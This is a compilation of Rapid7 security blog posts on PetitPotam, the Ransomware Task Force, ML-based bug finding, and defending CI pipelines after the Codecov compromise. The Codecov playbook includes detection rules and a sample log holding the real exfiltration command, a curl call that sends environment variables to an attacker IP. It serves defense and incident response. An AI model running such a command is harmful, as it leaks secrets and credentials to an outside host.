Late last month (July 2021), security researcher Topotam published a proof-of-concept (PoC) implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers.

PetitPotam works by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing an attacker who is able to leverage the technique to do… pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up here.

According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:

  • Certificate Authority Web Enrollment
  • Certificate Enrollment Web Service

NTLM relay attacks aren’t new — they’ve been around for decades. However, a few things make PetitPotam and its variants of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don’t need credentials to make this thing work, but more importantly, there’s no user interaction required to coerce a target domain controller to authenticate to a threat actor’s server. Not only is this easier to do — it’s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model.

Microsoft released an advisory with a series of updates in response to community concern about the attack — which, as they point out, is “a classic NTLM relay attack” that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft’s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in KB5005413. Since it looks like Microsoft will not issue an official fix for this vector, community researchers have added PetitPotam to a running list of “won’t fix” exploitable conditions in Microsoft products.

The PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to Active Directory Certificate Services attack surface area.

Mitigation Guidance

In general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) coupled with “Require SSL” for affected virtual sites, or signing features such as SMB signing. Implementing “Require SSL” is a critical step: Without it, EPA is ineffective.

As an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft’s KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers.

In this order, KB5005413 recommends:

  • Disabling NTLM Authentication on Windows domain controllers. Documentation on doing this can be found here.
  • Disabling NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. For step-by-step directions, see KB5005413.
  • Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

While not included in Microsoft’s official guidance, community researchers have tested using NETSH RPC filtering to block PetitPotam attacks with apparent success. Rapid7 research teams have not verified this behavior, but it may be an option for blocking the attack vector without negatively impacting local EFS functionality.

Rapid7 Customers

We are investigating approaches for adding assessment capabilities to InsightVM and Nexpose to determine exposure to PetitPotam relay attacks.


The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/


In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also continuing to see trends around ransomware-as-a-service and double or triple extortion continuing to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help to build greater understanding of what is happening in the attack landscape and may enable law enforcement to build more information on attackers, or even recapture payments.
  • Requiring organizations to conduct cost-benefit analysis prior to making payments (Action 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outsizes that of the ransom, leaving them no choice but to give into their attacker’s demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, believe it’s relevant to them, or understand how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.

[The Lost Bots] Episode 1: External Threat Intelligence

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/07/19/lost-bots-vlog/

Welcome to The Lost Bots, a new vlog series where Rapid7 resident expert and former CISO Jeffrey Gardner (virtually) sits down with fellow industry experts to spill the tea on current events and trends in the security space. They’ll also share security best practices and trade war stories with the Rapid7 SOC team. The best part? Each episode is short, sweet, and to the (end)point – so you gain insights from the industry’s brightest in just 15 minutes.

For this inaugural episode, Jeffrey sits down with Rapid7 Insight Platform SVP Pete Rubio and IntSights Cofounder and CPO Alon Arvats to discuss how teams can successfully leverage external threat intelligence to identify and mitigate lurking attacks. They tackle the “what”, “why”, and “how” of external threat intelligence. They also share how security teams can effectively put external threat intel into action and what behaviors and telemetry are the most useful to find advanced threats.

Stay tuned for future episodes of The Lost Bots! For our second installment, Jeffrey will be back to discuss a topic we’ve all been hearing a lot about in recent months: Extended Detection and Response, or XDR.

Accelerating SecOps and Emergent Threat Response with the Insight Platform

Post Syndicated from Lee Weiner original https://blog.rapid7.com/2021/07/19/insight-platform-and-extended-detection-response/

When we talk to customers about the Insight Platform and how to best support their evolving needs, they’re often not asking for another product, but rather a capability that enhances a current experience. Our customers have the core ingredients of a robust security program, but as their attack surfaces endlessly sprawl, they’re looking for ways to double down on the efficiency and streamlining of security operations they’re already experiencing from the platform today. Efficiency and streamlined operations are 2 areas where our team will continue to focus efforts in order to deliver value across Rapid7’s growing best-in-class portfolio, while enabling cross-capability experiences that improve security-team effectiveness.

Responding to emerging threats and vulnerabilities: Alerts are not enough

One of Rapid7’s greatest strengths is the fact that we have market-leading products in detection and response, cloud security, and vulnerability management. As we increasingly see customers leveraging our products, there are many similar expectations from those user bases. One that stands out is the expectation/demand that Rapid7 quickly respond to emerging threats and new vulnerabilities in a way that provides actionable context. We refer to this program as Emergent Threat Response. We spend a lot of time on this today, though we need to do more here for our customers to help them combat emerging threats. We’re often addressing and detailing what we know and what we’re doing about high-profile threats (e.g. SolarWinds SUNBURST, Microsoft Exchange Zero-Day), and while our customers have responded very positively to this type of outreach, they have also asked for more of it!

We have a unique opportunity with customers to enable a 2-way conversation. Our customers need to improve signal-to-noise, and our Emergent Threat Response approach does help to accomplish that. We can do a lot more though, and with more intelligence on the internal and external threat landscape we can offer more context and treat more threats with Emergent Threat Response. We’re constantly obsessing over improving signal-to-noise, so we’re careful to pick our spots. However, while an emerging threat may only impact a very small percentage of machines across our customer base, impacted customers may categorize those machines as high-value assets. Customers may also have a lot of interest in a specific threat group and are eager to learn more about them and the detections we have available for their known techniques. In both of these use cases — whether we’re pushing our intelligence or allowing customers to pull it — we can maintain our high standards for signal-to-noise as long as we’re always prioritizing relevancy.

The Insight Platform + IntSights: Enriching alerts and driving contextualized intelligence

When customers are battling emergent threats, core alerts and vulnerability information are important; but our customers are increasingly looking to understand more about adversary groups, tactics and techniques, and why they were targeted. Today we have a very comprehensive view of our customers’ internal networks. This is incredibly helpful to power every product we provide, but investing in more scalable ways to connect this internal profile to an external view of the world increases our ability to deliver timely, relevant, and actionable intelligence. With IntSights joining the Rapid7 family, this aspiration has become a reality. Beyond the Emergent Threat Response use case we drilled into here, the platform will leverage IntSights’ contextualized external threat intelligence to power and strengthen our threat library, risk scoring, and vulnerability prioritization. We believe we can add and enhance capabilities across the portfolio to not only help our customers solve the security concerns of today, but also take a proactive approach to defend against the security concerns of tomorrow.

Learn more about what’s in store for the Insight Platform as Rapid7 welcomes IntSights.

Why the Robot Hackers Aren’t Here (Yet)

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/07/14/why-the-robot-hackers-arent-here-yet/

“Estragon: I’m like that. Either I forget right away or I never forget.” – Samuel Beckett, Waiting for Godot

Hacking and Automation

As hackers, we spend a lot of time making things easier for ourselves.

For example, you might be aware of a tool called Metasploit, which can be used to make getting into a target easier. We’ve also built internet-scale scanning tools, allowing us to easily view data about open ports across the internet. Some of our less ethical comrades-in-arms build worms and botnets to automate the process of doing whatever they want to do.

If the heart of hacking is making things do what they shouldn’t, then perhaps the lungs are automation.

Over the years, we’ve seen security in general and vulnerability discovery in particular move from a risky, shady business to massive corporate-sponsored activities with open marketplaces for bug bounties. We’ve also seen a concomitant improvement in the techniques of hacking.

If hackers had known in 1996 that we’d go from stack-based buffer overflows to chaining ROP gadgets, perhaps we’d have asserted “no free bugs” earlier on. This maturity has allowed us to find a number of bugs that would have been unbelievable in the early 2000s, and exploits for those bugs are quickly packaged into tools like Metasploit.

Now that we’ve automated the process of running our exploits once they’ve been written, why is it so hard to get machines to find the bugs for us?

This is, of course, not for lack of trying. Fuzzing is a powerful technique that turns up a ton of bugs in an automated way. In fact, fuzzing is powerful enough that loads of folks turn up 0-days while they’re learning how to do fuzzing!

However, the trouble with fuzzing is that you never know what you’re going to turn up, and once you get a crash, there is a lot of work left to be done to craft an exploit and understand how and why the crash occurred — and that’s on top of all the work needed to craft a reliable exploit.

Automated bug finding, like we saw in the DARPA Cyber Grand Challenge, takes this to another level by combining fuzzing and symbolic execution with other program analysis techniques, like reachability and input dependence. But fuzzers and SMT solvers — a program that solves particular types of logic problems — haven’t found all the bugs, so what are we missing?

As with many problems in the last few years, organizations are hoping the answer lies in artificial intelligence and machine learning. The trouble with this hope is that AI is good at some tasks, and bug finding may simply not be one of them — at least not yet.

Learning to Find Bugs

Academic literature is rich with papers aiming to find bugs with machine learning. A quick Google Scholar search turns up over 140,000 articles on the topic as of this writing, and many of these articles seem to promise that, any day now, machine learning algorithms will turn up bugs in your source code.

There are a number of developer tools that suggest this could be true. Tools like Codota, Tabnine, and Kite will help auto-complete your code and are quite good. In fact, Microsoft has used GPT-3 to write code from natural language.

But creating code and finding bugs are, sadly, entirely different problems. A 2017 paper by Chappell et al. — a collaboration between Australia’s Queensland University of Technology and the technology giant Oracle — found that a variety of machine learning approaches vastly underperformed Oracle’s Parfait system, which uses more traditional symbolic analysis techniques on the intermediate representations used by the compiler.

Another paper, out of the University of Oslo in Norway, simulated SQL injection using Q-Learning, a form of reinforcement learning. This paper caused a stir in the MLSec community and especially within the DEF CON AI Village (full disclosure: I am an officer for the AI Village and helped cause the stir). The possibility of using a Roomba-like method to find bugs was deeply enticing, and Erdodi et al. did great work.

However, their method requires a very particular environment, and although the agent learned to exploit the specific simulation, the method does not seem to generalize well. So, what’s a hacker to do?

Blaming Our Boots

“Vladimir: There’s man all over for you, blaming on his boots the faults of his feet.” – Samuel Beckett, Waiting for Godot

One of the fundamental problems with throwing machine learning at security problems is that many ML techniques have been optimized for particular types of data. This is particularly important for deep learning techniques.

Images are tensors — a sort of matrix with not just height and width but also color channels — rectangular bitmaps with a range of possible values for each pixel. Natural language is tokenized, and those tokens are mapped into a word embedding, like GloVe or Word2Vec.

This is not to downplay the tremendous accomplishments of these machine learning techniques but to demonstrate that, in order for us to repurpose them, we must understand why they were built this way.

Unfortunately, the properties we find important for computer vision — shift invariance and orientation invariance — are not properties that are important for tasks like vulnerability detection or malware analysis. There is, likewise, a heavy dependence in log analysis and similar tasks on tokens that are unlikely to be in our vocabulary — oddly encoded strings, weird file names, and unusual commands. This makes these techniques unsuitable for many of our defensive tasks and, for similar reasons, mostly useless for generating net-new exploits.

Why doesn’t this work? A few issues are at play here. First, the machine does not understand what it is learning. Machine learning algorithms are ultimately function approximators — systems that see some inputs and some outputs, and figure out what function generated them.

For example, if our dataset is:

X = {1, 3, 7, 11, 2}

Y = {3, 7, 15, 23, 5}

Our algorithm might see the first input and output: 3 = f(1) and guess that f(x) = 3x.

By the second input, it would probably be able to figure out that y = f(x) = 2x + 1.

By the fifth, there would be a lot of good evidence that f(x) = 2x + 1. But this is a simple linear model, with one weight term and one bias term. Once we have to account for a large number of dimensions and a function that turns a label like “cat” into a 32 x 32 image with 3 color channels, approximating that function becomes much harder.
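As a quick sanity check, a few lines of POSIX shell can walk the sample pairs above and confirm the guess:

```shell
# Sample data from above; confirm y = f(x) = 2x + 1 for every pair
xs="1 3 7 11 2"
ys="3 7 15 23 5"

set -- $ys    # load the outputs as positional parameters
for x in $xs; do
    pred=$((2 * x + 1))
    echo "f($x) = $pred (observed $1)"
    shift
done
```

Every line prints a prediction that matches the observed output, which is exactly the evidence a learner accumulates.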

It stands to reason then that the function which maps a few dozen lines of code that spread across several files into a particular class of vulnerability will be harder still to approximate.

Ultimately, the problem is neither the technology on its own nor the data representation on its own. It is that we are trying to use the data we have to solve a hard problem without addressing the underlying difficulties of that problem.

In our case, the challenge is not identifying vulnerabilities that look like others we’ve found before. The challenge is in capturing the semantic meaning of the code and the code flow at a point, and using that information to generate an output that tells us whether or not a certain condition is met.

This is what SAT and SMT solvers are trying to do. It is worth noting, then, that from a purely theoretical perspective, this is SAT, the canonical NP-complete problem — which explains why the problem is so hard: we’re trying to solve one of the most challenging problems in computer science!

Waiting for Godot

The Samuel Beckett play, Waiting for Godot, centers around the characters of Vladimir and Estragon. The two characters are, as the title suggests, waiting for a character named Godot. To spoil a roughly 70-year-old play, I’ll give away the punchline: Godot never comes.

Today, security researchers who are interested in using artificial intelligence and machine learning to move the ball forward are in a similar position. We sit or stand by the leafless tree, waiting for our AI Godot. Like Vladimir and Estragon, our Godot will never come if we wait.

If we want to see more automation and applications of machine learning to vulnerability discovery, it will not suffice to repurpose convolutional neural networks, gradient-boosted decision trees, and transformers. Instead, we need to think about the way we represent data and how to capture the relevant details of that data. Then, we need to develop algorithms that can capture, learn, and retain that information.

We cannot wait for Godot — we have to find him ourselves.

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Post Syndicated from Justin Pagano original https://blog.rapid7.com/2021/07/09/securing-the-supply-chain-lessons-learned-from-the-codecov-compromise/

Supply chain attacks are all the rage these days. While they’re not a new part of the threat landscape, they are growing in popularity among more sophisticated threat actors, and they can create significant system-wide disruption, expense, and loss of confidence across multiple organizations, sectors, or regions. The compromise of Codecov’s Bash Uploader script is one of the latest such attacks. While much is still unknown about the full impact of this incident on organizations around the world, it’s been another wake up call for the world that cybersecurity problems are getting more complex by the day.

This blog post is meant to provide the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

It has been co-developed by our Information Security, Security Research, and Managed Detection & Response teams. We believe one of the best ways for organizations to close their security achievement gap and outpace attackers is by openly sharing knowledge about ever-evolving security best practices.

Defending CI systems and source code repositories from similar supply chain attacks

Below are some of the security best practices defenders can use to prevent, detect, and respond to incidents like the Codecov compromise.

Figure 1: High-level overview of known Codecov supply chain compromise stages

Prevention techniques

Provide and perform integrity checks for executable code

If you’re a software consumer

Use collision-resistant hash functions, such as SHA-256 or SHA-512, to validate the checksums your vendor provides for all executable files or code. Likewise, verify digital signatures for all executable files or code they provide.

If either of these integrity checks fail, notify your vendor ASAP as this could be a sign of compromised code.

If you’re a software supplier

Provide collision-resistant hashes, such as SHA-256 and SHA-512, and store checksums out-of-band from their corresponding files (i.e. make it so that an attacker has to successfully carry out two attacks to compromise your code: one against the system hosting your checksum data and another against your content delivery systems). Provide users with easy-to-use instructions, including sample code, for performing checksum validation.
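As an illustrative sketch of the generate-and-verify cycle (file names here are hypothetical), using coreutils:

```shell
# Stand-in for a vendor-supplied script
printf 'echo "hello from vendor"\n' > uploader.sh

# Supplier side: publish this checksum out-of-band from the file itself
sha256sum uploader.sh > uploader.sh.SHA256SUM

# Consumer side: verify the downloaded file before reviewing or running it
if sha256sum -c uploader.sh.SHA256SUM; then
    echo "checksum OK"
else
    echo "checksum MISMATCH: do not run; notify the vendor" >&2
fi
```

On macOS, `shasum -a 256` can stand in for `sha256sum`. The verification step should run in CI before the third-party code is ever executed.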

Additionally, digitally sign all executable code using tamper-resistant code signing frameworks such as in-toto and secure software update frameworks such as The Update Framework (TUF) (see DataDog’s blog post about using these tools for reference). Simply signing code with a private key is insufficient since attackers have demonstrated ways to compromise static signing keys stored on servers to forge authentic digital signatures.

Relevant for the following Codecov compromise attack stages:

  • Customers’ CI jobs dynamically load Bash Uploader

Version control third-party software components

Store and load local copies of third-party components in a version control system to track changes over time. Only update them after comparing code differences between versions, performing checksum validation, and authenticating digital signatures.

Relevant for the following Codecov compromise attack stages:

  • Bash Uploader script modified and replaced in GCS
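A minimal sketch of that review gate (file names hypothetical): the vendored copy lives in your repository, and an update is only applied after the diff has been inspected:

```shell
# Previously vendored copy, tracked in version control
mkdir -p vendor
printf 'echo v1\n' > vendor/third-party.sh

# Freshly downloaded upstream copy
printf 'echo v2\n' > third-party.new.sh

# Surface any upstream change for review; re-verify checksums and signatures too
if ! diff -u vendor/third-party.sh third-party.new.sh > third-party.diff; then
    echo "Upstream changed: review third-party.diff before replacing vendor/third-party.sh"
fi
```

Had Codecov customers pinned the Bash Uploader this way, the attacker's modification would have shown up as an unexplained diff rather than being loaded silently.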

Implement egress filtering

Identify trusted internet-accessible systems and apply host-based or network-based firewall rules to only allow egress network traffic to those trusted systems. Use specific IP addresses and fully qualified domain names whenever possible, and fallback to using IP ranges, subdomains, or domains only when necessary.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated

Implement IP address safelisting

While zero-trust networking (ZTN) has cast doubt on the effectiveness of network perimeter security controls, such as IP address safelisting, they are still one of the easiest and most effective ways to mitigate attacks targeting internet-routable systems. IP address safelisting is especially useful in the context of protecting service account access to systems when ZTN controls like hardware-backed device authentication certificates aren’t feasible to implement.

Popular source code repository services, such as GitHub, provide this functionality, although it may require you to host your own server or, if using their cloud hosted option, have multiple organizations in place to host your private repositories separately from your public repositories.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos
  • Bash Uploader script modified and replaced in GCS

Apply least privilege permissions for CI jobs using job-specific credentials

For any credentials a CI job uses, provide a credential for that specific job (i.e. do not reuse a single credential across multiple CI jobs). Only provision permissions to each credential that are needed for the CI job to execute successfully: no more, no less. This will shrink the blast radius of a credential compromise.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Use encrypted secrets management for safe credential storage

If you absolutely cannot avoid storing credentials in source code, use cryptographic tooling such as AWS KMS and the AWS Encryption SDK to encrypt credentials before storing them in source code. Otherwise, store them in a secrets management solution, such as Vault, AWS Secrets Manager, or GitHub Actions Encrypted Secrets (if you’re using GitHub Actions as your CI service, that is).

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Block plaintext secrets from code commits

Implement pre-commit hooks with tools like git-secrets to detect and block plaintext credentials before they’re committed to your repositories.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos
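git-secrets installs hooks of this shape for you; purely as an illustration of the mechanism (the pattern below is a simplified stand-in for its curated AWS rules), a bare-bones pre-commit hook might look like:

```shell
# Create a scratch repository to demonstrate the hook
repo=$(mktemp -d)
cd "$repo"
git init -q .

# Bare-bones pre-commit hook: reject staged changes containing an
# AWS-style access key ID
cat > .git/hooks/pre-commit <<'EOF'
#!/bin/sh
if git diff --cached | grep -E 'AKIA[0-9A-Z]{16}'; then
    echo "Potential plaintext credential detected; commit blocked." >&2
    exit 1
fi
EOF
chmod +x .git/hooks/pre-commit
```

A commit that stages a line like `aws_key=AKIAABCDEFGHIJKLMNOP` now fails at the hook. git-secrets layers curated patterns, repository scanning, and allowlisting on top of this basic idea.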

Use automated frequent service account credential rotation

Rotate credentials that are used programmatically (e.g. service account passwords, keys, tokens, etc.) to ensure that they’re made unusable at some point in the future if they’re exposed or obtained by an attacker.

If you’re able to automate credential rotation, rotate them as frequently as hourly. Also, create two “credential rotator” credentials that can both rotate all service account credentials and rotate each other. This ensures that the credential that is used to rotate other credentials is also short lived.

Relevant for the following Codecov compromise attack stages:

  • Creds used to access source code repos

Detection techniques

While we strongly advocate for adopting multiple layers of prevention controls to make it harder for attackers to compromise software supply chains, we also recognize that prevention controls are imperfect by themselves. Having multiple layers of detection controls is essential for catching suspicious or malicious activity that you can’t (or in some cases shouldn’t) have prevention controls for.

Identify Dependencies

You’ll need these in place to create detection rules and investigate suspicious activity:

  1. Process execution logs, including full command line data, or CI job output logs
  2. Network logs (firewall, network flow, etc.), including source and destination IP address
  3. Authentication logs (on-premise and cloud-based applications), including source IP and identity/account name
  4. Activity audit logs (on-premise and cloud-based applications), including source IP and identity/account name
  5. Indicators of compromise (IOCs), including IPs, commands, file hashes, etc.

Ingress from atypical IP addresses or regions

Whether or not you’re able to implement IP address safelisting for accessing certain systems/environments, use an IP address safelist to detect when atypical IP addresses are accessing critical systems that should only be accessed by trusted IPs.

Relevant for the following Codecov compromise attack stages:

  • Bash Uploader script modified and replaced in GCS
  • Creds used to access source code repos
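As a toy illustration (the log format and safelist contents are hypothetical; the flagged address is one of the published Codecov IOCs), comparing authentication events against a safelist can be as simple as:

```shell
# Trusted source IPs for the service account
cat > safelist.txt <<'EOF'
198.51.100.7
203.0.113.10
EOF

# Simplified authentication log
cat > auth.log <<'EOF'
2021-04-01T12:00:01Z login ok user=ci-bot src=198.51.100.7
2021-04-01T12:03:44Z login ok user=ci-bot src=178.62.86.114
EOF

# Print any event whose src= address is not on the safelist
awk 'NR == FNR { ok[$1]; next }
     { for (f = 1; f <= NF; f++)
         if ($f ~ /^src=/) { split($f, a, "="); if (!(a[2] in ok)) print } }' \
    safelist.txt auth.log
```

Only the 178.62.86.114 event is printed for triage; in practice this logic would live in a SIEM rule rather than a one-off script.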

Egress to atypical IP addresses or regions

Whether or not you’re able to implement egress filtering for certain systems/environments, use an IP address safelist to detect when atypical IP addresses are being connected to.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated

Environment variables being passed to network connectivity processes

It’s unusual for a system’s local environment variables to be exported and passed into processes used to communicate over a network (curl, wget, nc, etc.), regardless of the IP address or domain being connected to.

Relevant for the following Codecov compromise attack stages:

  • Environment variables, including creds, exfiltrated
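A rough detection sketch over process command-line logs (log contents hypothetical; the suspicious entry mirrors the published Codecov IOC command): flag network tools being handed `$(env)` or a piped `env`:

```shell
# Simplified process command-line log
cat > proc_cmdline.log <<'EOF'
curl -s https://codecov.io/bash
bash -c 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://178.62.86.114/upload/v2 || true'
wget https://example.com/release.tar.gz
EOF

# Match curl/wget/nc invocations that embed $(env), or env piped into them
grep -E '(curl|wget|nc)[^|]*\$\(env\)|env[[:space:]]*\|[[:space:]]*(curl|wget|nc)' proc_cmdline.log
```

Only the second entry matches. Real command lines obfuscate in many more ways, so treat a pattern like this as one signal among several, not a complete detection.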

Response techniques

The response techniques outlined below are, in some cases, described in the context of the IOCs that were published by Codecov. Dependencies identified in “Detection techniques” above are also dependencies for response steps outlined below.

Data exfiltration response steps: CI servers

Identify and contain affected systems and data

  1. Search CI systems’ process logs, job output, and job configuration files to identify usage of compromised third-party components (in regex form). This will identify potentially affected CI systems that have been using the third-party component that is in scope. This is useful for getting a full inventory of potentially affected systems and examining any local logs that might not be in your SIEM.

curl (-s )?https://codecov.io/bash

